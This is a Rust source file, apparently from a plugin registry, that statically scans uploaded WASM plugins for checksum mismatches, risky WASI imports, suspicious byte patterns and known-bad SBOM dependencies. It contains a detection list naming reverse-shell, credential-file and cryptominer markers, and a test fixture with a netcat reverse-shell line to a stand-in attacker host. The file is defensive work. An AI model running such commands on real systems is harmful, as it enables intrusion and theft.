1use std::time::Duration;
36
37use serde_json::{json, Value as JsonValue};
38use sha2::{Digest, Sha256};
39use tracing::{debug, error, info, warn};
40use wasmparser::{Parser, Payload};
41
42use crate::storage::PluginStorage;
43use crate::AppState;
44
45const WORKER_INTERVAL: Duration = Duration::from_secs(30);
46const JOBS_PER_TICK: i64 = 10;
47
48const SCAN_TIMEOUT: Duration = Duration::from_secs(15);
53
54const BYTE_SCAN_BUDGET: usize = 32 * 1024 * 1024;
59
60const ALLOWED_IMPORT_NAMESPACES: &[&str] = &[
65 "wasi_snapshot_preview1",
66 "wasi_unstable",
67 "env",
68 "mockforge",
69 "mockforge_host",
70];
71
72const HIGH_RISK_WASI_IMPORTS: &[(&str, &str, &str)] = &[
77 ("sock_open", "high", "opens outbound network sockets"),
78 ("sock_connect", "high", "initiates outbound network connections"),
79 ("sock_bind", "high", "binds to listening sockets"),
80 ("sock_accept", "high", "accepts inbound connections"),
81 ("path_open", "medium", "opens filesystem paths"),
82 ("path_create_directory", "medium", "creates directories"),
83 ("path_unlink_file", "medium", "deletes files"),
84 ("path_remove_directory", "medium", "removes directories"),
85 ("path_rename", "medium", "renames files"),
86 ("proc_exec", "critical", "executes external processes"),
87 ("proc_exit", "low", "exits the host process"),
88];
89
90const SUSPICIOUS_BYTE_PATTERNS: &[(&[u8], &str, &str)] = &[
96 (b"/bin/sh -c", "critical", "shell command invocation"),
97 (b"/bin/bash -c", "critical", "shell command invocation"),
98 (b"curl http", "high", "hardcoded outbound curl URL"),
99 (b"wget http", "high", "hardcoded outbound wget URL"),
100 (b"nc -e", "critical", "reverse shell marker (netcat -e)"),
101 (b"/etc/passwd", "high", "attempts to read system credentials file"),
102 (b"/etc/shadow", "critical", "attempts to read system shadow file"),
103 (b"aws_access_key_id=", "critical", "hardcoded AWS access key"),
104 (b"AKIA", "medium", "possible AWS access key id"),
105 (b"-----BEGIN PRIVATE KEY-----", "critical", "embedded private key"),
106 (b"-----BEGIN RSA PRIVATE KEY-----", "critical", "embedded RSA private key"),
107 (b"-----BEGIN OPENSSH PRIVATE KEY-----", "critical", "embedded SSH private key"),
108 (b"xmr.pool", "critical", "cryptominer pool URL"),
109 (b"stratum+tcp", "critical", "cryptominer stratum URL"),
110];
111
112pub fn start_plugin_scanner_worker(state: AppState) {
113 tokio::spawn(async move {
114 let mut interval = tokio::time::interval(WORKER_INTERVAL);
117 interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
118
119 loop {
120 interval.tick().await;
121 if let Err(e) = run_once(&state).await {
122 error!("plugin scanner tick failed: {}", e);
123 }
124 }
125 });
126
127 info!(
128 "Plugin security scanner worker started (interval = {}s)",
129 WORKER_INTERVAL.as_secs()
130 );
131}
132
133async fn run_once(state: &AppState) -> anyhow::Result<()> {
134 let jobs = state.store.list_pending_security_scans(JOBS_PER_TICK).await?;
135 if jobs.is_empty() {
136 debug!("plugin scanner: no pending jobs");
137 return Ok(());
138 }
139
140 info!("plugin scanner: processing {} pending job(s)", jobs.len());
141
142 for job in jobs {
143 let plugin_version_id = job.plugin_version_id;
144 let declared_checksum = job.checksum.clone();
145 match scan_one(&state.storage, &job).await {
146 Ok(mut result) => {
147 if let Ok(Some(sbom)) = state.store.get_plugin_version_sbom(plugin_version_id).await
154 {
155 let trust = verify_sbom_binding(&sbom, &declared_checksum);
156 record_sbom_binding(&mut result, &trust);
157
158 if let Ok(Some((key_id, signed_at))) =
164 state.store.get_plugin_version_attestation(plugin_version_id).await
165 {
166 append_finding(
167 &mut result,
168 json!({
169 "severity": "info",
170 "category": "supply_chain",
171 "title": "Verified publisher attestation",
172 "description": format!(
173 "SBOM was signed by a public key ({}) registered to the publishing account on {}. The account vouches for the dependency list.",
174 key_id,
175 signed_at.to_rfc3339()
176 )
177 }),
178 );
179 }
180
181 if matches!(trust, SbomBinding::Bound) {
182 apply_sbom_findings_async(&*state.store, &mut result, &sbom).await;
183 }
184 }
185 if let Err(e) = state
186 .store
187 .upsert_plugin_security_scan(
188 plugin_version_id,
189 &result.status,
190 result.score,
191 &result.findings,
192 Some(env!("CARGO_PKG_VERSION")),
193 )
194 .await
195 {
196 error!(
197 plugin = %job.plugin_name,
198 version = %job.version,
199 "failed to persist scan result: {}",
200 e
201 );
202 }
203 }
204 Err(e) => {
205 warn!(
210 plugin = %job.plugin_name,
211 version = %job.version,
212 "scan failed: {}",
213 e
214 );
215 let findings = json!([
216 {
217 "severity": "high",
218 "category": "other",
219 "title": "Security scan could not complete",
220 "description": format!(
221 "The registry was unable to finish scanning this artifact: {}. An operator will need to retry.",
222 e
223 )
224 }
225 ]);
226 if let Err(persist_err) = state
227 .store
228 .upsert_plugin_security_scan(
229 plugin_version_id,
230 "fail",
231 0,
232 &findings,
233 Some(env!("CARGO_PKG_VERSION")),
234 )
235 .await
236 {
237 error!(
238 plugin = %job.plugin_name,
239 version = %job.version,
240 "failed to persist scan error: {}",
241 persist_err
242 );
243 }
244 }
245 }
246 }
247
248 Ok(())
249}
250
251struct ScanOutcome {
252 status: String,
253 score: i16,
254 findings: JsonValue,
255}
256
257async fn scan_one(
258 storage: &PluginStorage,
259 job: &mockforge_registry_core::models::PendingScanJob,
260) -> anyhow::Result<ScanOutcome> {
261 let key = PluginStorage::plugin_object_key(&job.plugin_name, &job.version)?;
262 let bytes = storage.download_plugin(&key).await?;
263 let declared_size = job.file_size;
264 let declared_checksum = job.checksum.clone();
265
266 if let Some(path) = scanner_binary_path() {
273 match run_subprocess_scan(&path, &bytes, declared_size, &declared_checksum).await {
274 Ok(outcome) => return Ok(outcome),
275 Err(e) => {
276 warn!(
281 plugin = %job.plugin_name,
282 version = %job.version,
283 "subprocess scanner failed ({}) — falling back to in-process analysis",
284 e
285 );
286 }
287 }
288 }
289
290 let scan_fut = tokio::task::spawn_blocking(move || {
299 analyze_bytes(&bytes, declared_size, declared_checksum.as_str())
300 });
301
302 let join_result = match tokio::time::timeout(SCAN_TIMEOUT, scan_fut).await {
303 Ok(res) => res,
304 Err(_) => {
305 return Ok(ScanOutcome {
306 status: "fail".to_string(),
307 score: 0,
308 findings: JsonValue::Array(vec![json!({
309 "severity": "high",
310 "category": "other",
311 "title": "Scan timed out",
312 "description": format!(
313 "Static analysis exceeded the {}s budget. This usually means a pathological WASM input; the artifact is rejected until a manual review runs.",
314 SCAN_TIMEOUT.as_secs()
315 )
316 })]),
317 });
318 }
319 };
320
321 match join_result {
322 Ok(outcome) => Ok(outcome),
323 Err(join_err) => {
324 Ok(ScanOutcome {
327 status: "fail".to_string(),
328 score: 0,
329 findings: JsonValue::Array(vec![json!({
330 "severity": "critical",
331 "category": "other",
332 "title": "Scanner panicked",
333 "description": format!(
334 "The static scanner panicked while processing this artifact: {}. This is a scanner bug — the plugin has been marked failed pending investigation.",
335 join_err
336 )
337 })]),
338 })
339 }
340 }
341}
342
343fn scanner_binary_path() -> Option<String> {
347 if let Ok(path) = std::env::var("MOCKFORGE_PLUGIN_SCANNER_BIN") {
348 if !path.trim().is_empty() {
349 return Some(path);
350 }
351 }
352 Some("mockforge-plugin-scanner".to_string())
355}
356
357async fn run_subprocess_scan(
358 scanner_path: &str,
359 bytes: &[u8],
360 declared_size: i64,
361 declared_checksum: &str,
362) -> anyhow::Result<ScanOutcome> {
363 let bytes_owned = bytes.to_vec();
369 let tmp_path = tokio::task::spawn_blocking(move || -> std::io::Result<_> {
370 use std::io::Write;
371 let mut tmp = tempfile::NamedTempFile::new()?;
372 tmp.write_all(&bytes_owned)?;
373 tmp.flush()?;
374 Ok(tmp.into_temp_path())
376 })
377 .await??;
378
379 let mut cmd = tokio::process::Command::new(scanner_path);
380 cmd.arg("--wasm-path")
381 .arg::<&std::path::Path>(tmp_path.as_ref())
382 .arg("--checksum")
383 .arg(declared_checksum)
384 .arg("--declared-size")
385 .arg(declared_size.to_string())
386 .kill_on_drop(true)
387 .stdout(std::process::Stdio::piped())
388 .stderr(std::process::Stdio::piped());
389
390 let output_fut = cmd.output();
391 let output = match tokio::time::timeout(SCAN_TIMEOUT, output_fut).await {
392 Ok(res) => res?,
393 Err(_) => {
394 anyhow::bail!(
395 "subprocess scanner exceeded {}s wall-clock budget",
396 SCAN_TIMEOUT.as_secs()
397 );
398 }
399 };
400
401 drop(tmp_path);
404
405 if !output.status.success() {
406 anyhow::bail!(
407 "subprocess scanner exited with {}: {}",
408 output.status,
409 String::from_utf8_lossy(&output.stderr).trim()
410 );
411 }
412
413 let report: SubprocessReport = serde_json::from_slice(&output.stdout).map_err(|e| {
414 anyhow::anyhow!(
415 "subprocess scanner returned invalid JSON: {} (stdout was: {:?})",
416 e,
417 String::from_utf8_lossy(&output.stdout)
418 )
419 })?;
420
421 let findings = serde_json::to_value(&report.findings)?;
426
427 Ok(ScanOutcome {
428 status: report.status,
429 score: report.score,
430 findings,
431 })
432}
433
434#[derive(Debug, serde::Deserialize)]
435struct SubprocessReport {
436 status: String,
437 score: i16,
438 findings: Vec<SubprocessFinding>,
439 #[allow(dead_code)]
440 dynamic_instantiable: bool,
441 #[allow(dead_code)]
442 duration_ms: u128,
443}
444
445#[derive(Debug, serde::Deserialize, serde::Serialize)]
446struct SubprocessFinding {
447 severity: String,
448 category: String,
449 title: String,
450 description: String,
451}
452
453fn analyze_bytes(bytes: &[u8], declared_size: i64, declared_checksum: &str) -> ScanOutcome {
454 let mut findings: Vec<JsonValue> = Vec::new();
455 let mut score: i16 = 100;
456
457 let actual_size = bytes.len() as i64;
460 if actual_size != declared_size {
461 findings.push(json!({
462 "severity": "high",
463 "category": "other",
464 "title": "Artifact size mismatch",
465 "description": format!(
466 "Stored artifact is {} bytes but the publish request declared {}.",
467 actual_size, declared_size
468 )
469 }));
470 score -= 40;
471 }
472
473 let computed = {
474 let mut hasher = Sha256::new();
475 hasher.update(bytes);
476 hex_encode(&hasher.finalize())
477 };
478 if !computed.eq_ignore_ascii_case(declared_checksum) {
479 findings.push(json!({
480 "severity": "critical",
481 "category": "supply_chain",
482 "title": "Checksum mismatch",
483 "description": format!(
484 "SHA-256 of stored artifact ({}) does not match the checksum recorded at publish time ({}).",
485 computed, declared_checksum
486 )
487 }));
488 score = score.saturating_sub(60);
489 }
490
491 if bytes.len() < 8 || &bytes[0..4] != b"\0asm" {
494 findings.push(json!({
495 "severity": "critical",
496 "category": "other",
497 "title": "Not a valid WebAssembly module",
498 "description": "Artifact does not begin with the WASM magic bytes (\\0asm). It cannot be loaded by any MockForge runtime.",
499 }));
500 return ScanOutcome {
501 status: "fail".to_string(),
502 score: 0,
503 findings: JsonValue::Array(findings),
504 };
505 }
506
507 let version = u32::from_le_bytes([bytes[4], bytes[5], bytes[6], bytes[7]]);
511 if version != 1 {
512 findings.push(json!({
513 "severity": "medium",
514 "category": "other",
515 "title": "Unexpected WASM binary version",
516 "description": format!(
517 "Module declares WASM binary version {} — the only currently-stable value is 1. This may indicate an experimental toolchain.",
518 version
519 )
520 }));
521 score = score.saturating_sub(10);
522 }
523
524 let mut import_count = 0u32;
527 let mut unknown_namespaces = std::collections::BTreeSet::new();
528 let mut high_risk_imports: Vec<(String, &'static str, &'static str)> = Vec::new();
529 let mut export_count = 0u32;
530 let mut has_plugin_entrypoint = false;
531 let mut data_segment_bytes: usize = 0;
532 let mut parse_error: Option<String> = None;
533
534 let parser = Parser::new(0);
535 for payload in parser.parse_all(bytes) {
536 match payload {
537 Ok(Payload::ImportSection(reader)) => {
538 for import in reader {
539 match import {
540 Ok(imp) => {
541 import_count += 1;
542 let ns = imp.module;
543 if !ALLOWED_IMPORT_NAMESPACES.contains(&ns) {
544 unknown_namespaces.insert(ns.to_string());
545 }
546 if ns.starts_with("wasi") {
547 if let Some(entry) =
548 HIGH_RISK_WASI_IMPORTS.iter().find(|(n, _, _)| *n == imp.name)
549 {
550 high_risk_imports.push((
551 format!("{}::{}", ns, imp.name),
552 entry.1,
553 entry.2,
554 ));
555 }
556 }
557 }
558 Err(e) => {
559 parse_error = Some(format!("malformed import: {}", e));
560 break;
561 }
562 }
563 }
564 }
565 Ok(Payload::ExportSection(reader)) => {
566 for export in reader {
567 match export {
568 Ok(exp) => {
569 export_count += 1;
570 if exp.name.starts_with("_mockforge_")
576 || exp.name.starts_with("mockforge_plugin_")
577 || exp.name == "_start"
578 {
579 has_plugin_entrypoint = true;
580 }
581 }
582 Err(e) => {
583 parse_error = Some(format!("malformed export: {}", e));
584 break;
585 }
586 }
587 }
588 }
589 Ok(Payload::DataSection(reader)) => {
590 for segment in reader {
591 match segment {
592 Ok(seg) => {
593 data_segment_bytes = data_segment_bytes.saturating_add(seg.data.len());
594 }
595 Err(e) => {
596 parse_error = Some(format!("malformed data segment: {}", e));
597 break;
598 }
599 }
600 }
601 }
602 Ok(_) => {}
603 Err(e) => {
604 parse_error = Some(e.to_string());
605 break;
606 }
607 }
608 }
609
610 if let Some(err) = parse_error {
611 findings.push(json!({
612 "severity": "high",
613 "category": "other",
614 "title": "WASM module failed to parse",
615 "description": format!("wasmparser rejected the module: {}", err),
616 }));
617 score = score.saturating_sub(40);
618 }
619
620 if !unknown_namespaces.is_empty() {
623 score = score.saturating_sub(15);
624 for ns in &unknown_namespaces {
625 findings.push(json!({
626 "severity": "medium",
627 "category": "supply_chain",
628 "title": "Unknown host import namespace",
629 "description": format!(
630 "Plugin imports from '{}', which is not provided by any MockForge runtime binding.",
631 ns
632 )
633 }));
634 }
635 }
636
637 for (full_name, severity, human) in &high_risk_imports {
640 let penalty: i16 = match *severity {
641 "critical" => 40,
642 "high" => 20,
643 "medium" => 8,
644 _ => 3,
645 };
646 score = score.saturating_sub(penalty);
647 findings.push(json!({
648 "severity": severity,
649 "category": "insecure_coding",
650 "title": format!("High-risk WASI import: {}", full_name),
651 "description": format!(
652 "This plugin imports a capability that {}. MockForge plugins usually do not need this — review carefully before using.",
653 human
654 )
655 }));
656 }
657
658 if export_count > 0 && !has_plugin_entrypoint {
662 findings.push(json!({
663 "severity": "info",
664 "category": "other",
665 "title": "No MockForge plugin entrypoint found",
666 "description": "No exported function matched '_mockforge_*', 'mockforge_plugin_*', or '_start'. This may just be a naming convention mismatch, but the plugin runtime may fail to load it."
667 }));
668 }
669
670 findings.push(json!({
673 "severity": "info",
674 "category": "other",
675 "title": "Module inventory",
676 "description": format!(
677 "{} import(s), {} export(s), {} byte(s) in data segments.",
678 import_count, export_count, data_segment_bytes
679 )
680 }));
681
682 let scan_slice = if bytes.len() > BYTE_SCAN_BUDGET {
685 &bytes[..BYTE_SCAN_BUDGET]
686 } else {
687 bytes
688 };
689 let lowered = scan_slice.to_ascii_lowercase();
690 for (pattern, severity, description) in SUSPICIOUS_BYTE_PATTERNS {
691 let needle = pattern.to_ascii_lowercase();
692 if contains_subslice(&lowered, &needle) {
693 let penalty: i16 = match *severity {
694 "critical" => 50,
695 "high" => 25,
696 "medium" => 10,
697 _ => 5,
698 };
699 score = score.saturating_sub(penalty);
700 findings.push(json!({
701 "severity": severity,
702 "category": "malware",
703 "title": format!("Suspicious byte pattern: {}", description),
704 "description": format!(
705 "Artifact contains the byte pattern '{}'. This is a strong signal of {}.",
706 String::from_utf8_lossy(pattern),
707 description
708 )
709 }));
710 }
711 }
712
713 if bytes.len() > BYTE_SCAN_BUDGET {
714 findings.push(json!({
715 "severity": "info",
716 "category": "other",
717 "title": "Artifact exceeds byte-scan budget",
718 "description": format!(
719 "Only the first {} bytes were scanned for byte patterns. Artifacts larger than this cap should be reviewed manually.",
720 BYTE_SCAN_BUDGET
721 )
722 }));
723 }
724
725 let clamped = score.clamp(0, 100);
728 let status = if clamped >= 70 {
729 "pass"
730 } else if clamped >= 40 {
731 "warning"
732 } else {
733 "fail"
734 };
735
736 ScanOutcome {
737 status: status.to_string(),
738 score: clamped,
739 findings: JsonValue::Array(findings),
740 }
741}
742
743fn contains_subslice(haystack: &[u8], needle: &[u8]) -> bool {
747 if needle.is_empty() || needle.len() > haystack.len() {
748 return false;
749 }
750 haystack.windows(needle.len()).any(|w| w == needle)
751}
752
753const KNOWN_VULNERABLE_PACKAGES: &[(&str, &str, &str, &str, &str)] = &[
764 (
766 "npm",
767 "event-stream",
768 "3.3.6",
769 "critical",
770 "event-stream@3.3.6 shipped a malicious payload (flatmap-stream) targeting a specific bitcoin wallet library (2018).",
771 ),
772 (
773 "npm",
774 "flatmap-stream",
775 "0.1.1",
776 "critical",
777 "flatmap-stream@0.1.1 was the vehicle for the event-stream supply-chain compromise.",
778 ),
779 (
780 "npm",
781 "colors",
782 "1.4.1",
783 "high",
784 "colors@1.4.1 was intentionally sabotaged by the maintainer to emit garbage output (2022).",
785 ),
786 (
787 "npm",
788 "faker",
789 "6.6.6",
790 "high",
791 "faker@6.6.6 was intentionally broken by the maintainer (2022).",
792 ),
793 (
794 "npm",
795 "ua-parser-js",
796 "0.7.29",
797 "high",
798 "ua-parser-js@0.7.29 had a credential-stealer injected during a brief maintainer compromise.",
799 ),
800 (
801 "cargo",
802 "rustdecimal",
803 "",
804 "critical",
805 "rustdecimal (all versions) was a typosquat of rust_decimal hosting a malicious payload.",
806 ),
807 (
808 "cargo",
809 "openssl-src",
810 "111.0.",
811 "high",
812 "openssl-src 111.0.x bundles very old OpenSSL with several CVEs. Upgrade to 300.x or later.",
813 ),
814 (
815 "pypi",
816 "ctx",
817 "",
818 "critical",
819 "ctx on PyPI was hijacked in 2022 and replaced with a credential exfiltrator; any version pins are suspect.",
820 ),
821];
822
823#[derive(Debug)]
839enum SbomBinding {
840 Bound,
841 Unsigned,
842 Mismatch { declared: String },
843}
844
845fn verify_sbom_binding(sbom: &JsonValue, expected_checksum: &str) -> SbomBinding {
846 let expected = expected_checksum.to_ascii_lowercase();
847
848 let mut declared: Vec<String> = Vec::new();
851 collect_sha256_hashes(sbom, &mut declared);
852
853 if declared.is_empty() {
854 return SbomBinding::Unsigned;
855 }
856
857 for d in &declared {
858 if d.eq_ignore_ascii_case(&expected) {
859 return SbomBinding::Bound;
860 }
861 }
862
863 SbomBinding::Mismatch {
866 declared: declared.into_iter().next().unwrap_or_default(),
867 }
868}
869
870fn collect_sha256_hashes(node: &JsonValue, out: &mut Vec<String>) {
874 match node {
875 JsonValue::Object(map) => {
876 if let Some(JsonValue::Array(hashes)) = map.get("hashes") {
877 for h in hashes {
878 let alg =
879 h.get("alg").and_then(|v| v.as_str()).unwrap_or("").to_ascii_lowercase();
880 let content = h.get("content").and_then(|v| v.as_str()).unwrap_or("");
881 if (alg == "sha-256" || alg == "sha256") && !content.is_empty() {
882 out.push(content.to_ascii_lowercase());
883 }
884 }
885 }
886 for v in map.values() {
887 collect_sha256_hashes(v, out);
888 }
889 }
890 JsonValue::Array(arr) => {
891 for v in arr {
892 collect_sha256_hashes(v, out);
893 }
894 }
895 _ => {}
896 }
897}
898
899fn record_sbom_binding(outcome: &mut ScanOutcome, binding: &SbomBinding) {
900 match binding {
901 SbomBinding::Bound => {
902 append_finding(
903 outcome,
904 json!({
905 "severity": "info",
906 "category": "supply_chain",
907 "title": "SBOM bound to artifact",
908 "description": "SBOM contains a SHA-256 digest matching the published WASM. Dependency findings below are derived from this verified SBOM."
909 }),
910 );
911 }
912 SbomBinding::Unsigned => {
913 append_finding(
914 outcome,
915 json!({
916 "severity": "medium",
917 "category": "supply_chain",
918 "title": "SBOM not bound to artifact",
919 "description": "SBOM did not declare a SHA-256 hash for the artifact. Without a hash there's no way to prove this SBOM describes the WASM being published — dependency scanning was skipped. Add a `hashes: [{alg: \"SHA-256\", content: \"...\"}]` entry to metadata.component or the matching components[] row."
920 }),
921 );
922 let current = outcome.score as i32;
924 let new = (current - 5).clamp(0, 100);
925 outcome.score = new as i16;
926 }
927 SbomBinding::Mismatch { declared } => {
928 append_finding(
929 outcome,
930 json!({
931 "severity": "critical",
932 "category": "supply_chain",
933 "title": "SBOM claims a different artifact",
934 "description": format!(
935 "SBOM declared SHA-256 `{}`, but the published artifact hashes to a different value. The SBOM is not about this WASM — dependency scanning was skipped and the artifact is marked fail.",
936 declared
937 )
938 }),
939 );
940 let current = outcome.score as i32;
942 let new = (current - 60).clamp(0, 100);
943 outcome.score = new as i16;
944 outcome.status = if new >= 70 {
945 outcome.status.clone()
946 } else if new >= 40 {
947 "warning".to_string()
948 } else {
949 "fail".to_string()
950 };
951 }
952 }
953}
954
955async fn apply_sbom_findings_async(
960 store: &dyn crate::store::RegistryStore,
961 outcome: &mut ScanOutcome,
962 sbom: &JsonValue,
963) {
964 let cache_empty = store.count_osv_advisories().await.unwrap_or(0) == 0;
965 if cache_empty {
966 apply_sbom_findings(outcome, sbom);
969 append_finding(
970 outcome,
971 json!({
972 "severity": "info",
973 "category": "other",
974 "title": "Using seed vulnerability list",
975 "description": "OSV advisory cache is empty — the scanner fell back to the built-in seed list. Run the osv_sync worker to populate the cache."
976 }),
977 );
978 return;
979 }
980
981 let components = match sbom.get("components").and_then(|c| c.as_array()) {
982 Some(c) => c,
983 None => {
984 append_finding(
985 outcome,
986 json!({
987 "severity": "info",
988 "category": "other",
989 "title": "SBOM has no 'components' array",
990 "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
991 }),
992 );
993 return;
994 }
995 };
996
997 let mut checked = 0usize;
998 let mut score_delta: i32 = 0;
999 for comp in components {
1000 let Some((ecosystem, name, version)) = parse_component(comp) else {
1001 continue;
1002 };
1003 checked += 1;
1004
1005 let matches = match store.find_osv_matches(&ecosystem, &name, &version).await {
1006 Ok(m) => m,
1007 Err(e) => {
1008 warn!("osv lookup failed for {}:{}@{}: {}", ecosystem, name, version, e);
1009 continue;
1010 }
1011 };
1012
1013 for m in matches {
1014 let penalty: i32 = match m.severity.as_str() {
1015 "critical" => 40,
1016 "high" => 20,
1017 "medium" => 8,
1018 _ => 3,
1019 };
1020 score_delta = score_delta.saturating_add(penalty);
1021 append_finding(
1022 outcome,
1023 json!({
1024 "severity": m.severity,
1025 "category": "vulnerable_dependency",
1026 "title": format!(
1027 "{}: {}:{}@{}",
1028 m.advisory_id, ecosystem, name, version
1029 ),
1030 "description": m.summary,
1031 }),
1032 );
1033 }
1034 }
1035
1036 append_finding(
1037 outcome,
1038 json!({
1039 "severity": "info",
1040 "category": "other",
1041 "title": "SBOM scanned against OSV cache",
1042 "description": format!(
1043 "Checked {} component(s) against the live OSV advisory cache.",
1044 checked
1045 )
1046 }),
1047 );
1048
1049 if score_delta > 0 {
1050 let current = outcome.score as i32;
1051 let new = (current - score_delta).clamp(0, 100);
1052 outcome.score = new as i16;
1053 outcome.status = if new >= 70 {
1054 outcome.status.clone()
1055 } else if new >= 40 {
1056 "warning".to_string()
1057 } else {
1058 "fail".to_string()
1059 };
1060 }
1061}
1062
1063fn apply_sbom_findings(outcome: &mut ScanOutcome, sbom: &JsonValue) {
1071 let components = match sbom.get("components").and_then(|c| c.as_array()) {
1072 Some(c) => c,
1073 None => {
1074 append_finding(
1075 outcome,
1076 json!({
1077 "severity": "info",
1078 "category": "other",
1079 "title": "SBOM has no 'components' array",
1080 "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
1081 }),
1082 );
1083 return;
1084 }
1085 };
1086
1087 let mut checked = 0usize;
1088 let mut score_delta: i32 = 0;
1089 for comp in components {
1090 let Some((ecosystem, name, version)) = parse_component(comp) else {
1093 continue;
1094 };
1095 checked += 1;
1096
1097 for (vuln_eco, vuln_name, vuln_prefix, severity, description) in KNOWN_VULNERABLE_PACKAGES {
1098 if *vuln_eco != ecosystem || *vuln_name != name {
1099 continue;
1100 }
1101 if !vuln_prefix.is_empty() && !version.starts_with(vuln_prefix) {
1102 continue;
1103 }
1104 let penalty: i32 = match *severity {
1105 "critical" => 40,
1106 "high" => 20,
1107 "medium" => 8,
1108 _ => 3,
1109 };
1110 score_delta = score_delta.saturating_add(penalty);
1111 append_finding(
1112 outcome,
1113 json!({
1114 "severity": severity,
1115 "category": "vulnerable_dependency",
1116 "title": format!("Known-bad dependency: {}:{}@{}", ecosystem, name, version),
1117 "description": description,
1118 }),
1119 );
1120 }
1121 }
1122
1123 append_finding(
1124 outcome,
1125 json!({
1126 "severity": "info",
1127 "category": "other",
1128 "title": "SBOM scanned",
1129 "description": format!(
1130 "Checked {} component(s) against {} known-vulnerable entries.",
1131 checked,
1132 KNOWN_VULNERABLE_PACKAGES.len()
1133 )
1134 }),
1135 );
1136
1137 if score_delta > 0 {
1138 let current = outcome.score as i32;
1139 let new = (current - score_delta).clamp(0, 100);
1140 outcome.score = new as i16;
1141 outcome.status = if new >= 70 {
1143 outcome.status.clone()
1144 } else if new >= 40 {
1145 "warning".to_string()
1146 } else {
1147 "fail".to_string()
1148 };
1149 }
1150}
1151
1152fn parse_component(comp: &JsonValue) -> Option<(String, String, String)> {
1157 if let Some(purl) = comp.get("purl").and_then(|v| v.as_str()) {
1158 if let Some(rest) = purl.strip_prefix("pkg:") {
1160 let mut parts = rest.splitn(2, '/');
1161 let ecosystem = parts.next()?.to_ascii_lowercase();
1162 let name_ver = parts.next()?;
1163 let mut nv = name_ver.splitn(2, '@');
1164 let name = nv.next()?.to_string();
1165 let version = nv.next().unwrap_or("").to_string();
1166 return Some((ecosystem, name, version));
1167 }
1168 }
1169 let name = comp.get("name")?.as_str()?.to_string();
1170 let version = comp.get("version").and_then(|v| v.as_str()).unwrap_or("").to_string();
1171 let ecosystem = comp
1174 .get("group")
1175 .and_then(|v| v.as_str())
1176 .map(str::to_ascii_lowercase)
1177 .unwrap_or_else(|| "unknown".to_string());
1178 Some((ecosystem, name, version))
1179}
1180
1181fn append_finding(outcome: &mut ScanOutcome, finding: JsonValue) {
1182 match &mut outcome.findings {
1183 JsonValue::Array(arr) => arr.push(finding),
1184 _ => {
1185 outcome.findings = JsonValue::Array(vec![finding]);
1186 }
1187 }
1188}
1189
1190fn hex_encode(bytes: &[u8]) -> String {
1191 const HEX: &[u8; 16] = b"0123456789abcdef";
1192 let mut out = String::with_capacity(bytes.len() * 2);
1193 for b in bytes {
1194 out.push(HEX[(b >> 4) as usize] as char);
1195 out.push(HEX[(b & 0x0f) as usize] as char);
1196 }
1197 out
1198}
1199
1200#[cfg(test)]
1201mod tests {
1202 use super::*;
1203
1204 const EMPTY_WASM: &[u8] = b"\0asm\x01\x00\x00\x00";
1207
1208 fn sha256_hex(bytes: &[u8]) -> String {
1209 hex_encode(&Sha256::digest(bytes))
1210 }
1211
1212 #[test]
1213 fn hex_encode_matches_sha2_hex_crate() {
1214 let digest = Sha256::digest(b"hello world");
1215 assert_eq!(hex_encode(&digest), hex::encode(digest));
1216 }
1217
1218 #[test]
1219 fn contains_subslice_edge_cases() {
1220 assert!(!contains_subslice(b"", b"abc"));
1221 assert!(!contains_subslice(b"ab", b"abc"));
1222 assert!(!contains_subslice(b"ab", b""));
1223 assert!(contains_subslice(b"abcdef", b"cde"));
1224 assert!(contains_subslice(b"abcdef", b"a"));
1225 assert!(contains_subslice(b"abcdef", b"f"));
1226 assert!(!contains_subslice(b"abcdef", b"xyz"));
1227 }
1228
1229 #[test]
1230 fn analyze_empty_module_is_clean() {
1231 let checksum = sha256_hex(EMPTY_WASM);
1232 let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, &checksum);
1233 assert_eq!(outcome.status, "pass");
1234 assert!(outcome.score >= 70, "expected passing score, got {}", outcome.score);
1235 }
1236
1237 #[test]
1238 fn analyze_rejects_non_wasm_magic() {
1239 let junk = b"not-a-wasm-file";
1240 let outcome = analyze_bytes(junk, junk.len() as i64, &sha256_hex(junk));
1241 assert_eq!(outcome.status, "fail");
1242 assert_eq!(outcome.score, 0);
1243 let findings = outcome.findings.as_array().unwrap();
1244 assert!(findings
1245 .iter()
1246 .any(|f| f["title"].as_str().unwrap().contains("Not a valid WebAssembly module")));
1247 }
1248
1249 #[test]
1250 fn analyze_flags_checksum_mismatch() {
1251 let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, "deadbeef");
1252 let findings = outcome.findings.as_array().unwrap();
1253 assert!(findings.iter().any(|f| f["title"].as_str().unwrap() == "Checksum mismatch"));
1254 assert!(outcome.score < 50);
1255 }
1256
1257 #[test]
1258 fn analyze_flags_size_mismatch() {
1259 let outcome = analyze_bytes(EMPTY_WASM, 999_999, &sha256_hex(EMPTY_WASM));
1260 let findings = outcome.findings.as_array().unwrap();
1261 assert!(findings
1262 .iter()
1263 .any(|f| f["title"].as_str().unwrap() == "Artifact size mismatch"));
1264 }
1265
1266 #[test]
1267 fn analyze_detects_suspicious_byte_pattern() {
1268 let mut bytes = EMPTY_WASM.to_vec();
1272 bytes.extend_from_slice(b"nc -e /bin/sh attacker.example.com 4444");
1273 let checksum = sha256_hex(&bytes);
1274 let outcome = analyze_bytes(&bytes, bytes.len() as i64, &checksum);
1275 assert_eq!(outcome.status, "fail");
1276 let findings = outcome.findings.as_array().unwrap();
1277 assert!(findings.iter().any(|f| {
1278 f["title"].as_str().unwrap().contains("reverse shell")
1279 || f["title"].as_str().unwrap().contains("Suspicious byte pattern")
1280 }));
1281 }
1282
1283 #[test]
1284 fn analyze_flags_unexpected_wasm_version() {
1285 let bytes = b"\0asm\x02\x00\x00\x00";
1287 let checksum = sha256_hex(bytes);
1288 let outcome = analyze_bytes(bytes, bytes.len() as i64, &checksum);
1289 let findings = outcome.findings.as_array().unwrap();
1290 assert!(findings
1291 .iter()
1292 .any(|f| f["title"].as_str().unwrap() == "Unexpected WASM binary version"));
1293 }
1294
1295 fn clean_outcome() -> ScanOutcome {
1296 ScanOutcome {
1297 status: "pass".to_string(),
1298 score: 100,
1299 findings: JsonValue::Array(vec![]),
1300 }
1301 }
1302
1303 #[test]
1304 fn sbom_flags_known_bad_via_purl() {
1305 let sbom = serde_json::json!({
1306 "components": [
